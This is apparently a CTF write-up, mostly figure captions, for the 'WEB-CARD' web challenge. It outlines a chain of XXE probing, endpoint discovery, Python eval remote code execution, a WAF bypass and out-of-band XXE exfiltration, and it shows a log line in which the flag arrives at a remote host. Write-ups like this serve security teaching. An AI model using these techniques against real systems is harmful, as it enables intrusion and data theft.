INSANE CTF.ZONE:: WEB-CARD explained

Fig. 1. Landing
Fig. 2. The original response

STAGE 1

First attempt: XXE through request body

Fig. 3. Checking XXE with file-scheme
Fig. 4. Checking XXE with http-scheme

Second attempt: Fuzzing payload format

Fig. 5. Attempt to inject tags into attribute value
Fig. 6. Attempt to send invalid string value for field with type int
Fig. 7. Attempt to send random string as a value of type-attribute for field

Endpoint discovery

Fig. 8. Dirbusting with Burp Suite Intruder (why not? 🙂)
Fig. 9. Checking /dev/api/render

Third attempt: Fuzzing payload format through developers’ endpoint

Fig. 10. Attempt to inject tags into attrubute value
Fig. 11. Attempt to send random string as a value of type-attribute for field
Fig. 12. Attempt to send invalid string value for field with type int
Fig. 13. Executing Python code with eval function

We use eval instead of exec, because exec doesn’t return any value, but we want to see the result in the response instead of None.

Investigating server through RCE

{internet} -> 80:[front] -> 4041:[waf]{FLAG is here} -> 3031:[app]
|
|
------> 3031:[app-dev]

STAGE 2

WAF Bypass

STAGE 3

<!ATTLIST ...> is an attribute declaration in DTD (simple explanation here).

Note that %height_default; is defined in internal DTD but used inside external DTD. This is very convenient when remote part of payload stays constant.

172.42.73.7 - [11/Feb/2021 03:13:37] 
"GET /?ctf.zone{78806158f1928b18ec1a583c0b9b82c5} HTTP/1.1" 200 -

The whole chain

Fig. 14. The whole chain of exploitation

BONUS: Original design w/o simplification :)

Fig. 15. The original chain of exploitation

Credits

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
OFFZONE

OFFZONE

International community conference for cybersecurity researchers and professionals. No suits, no business — only hardcore research.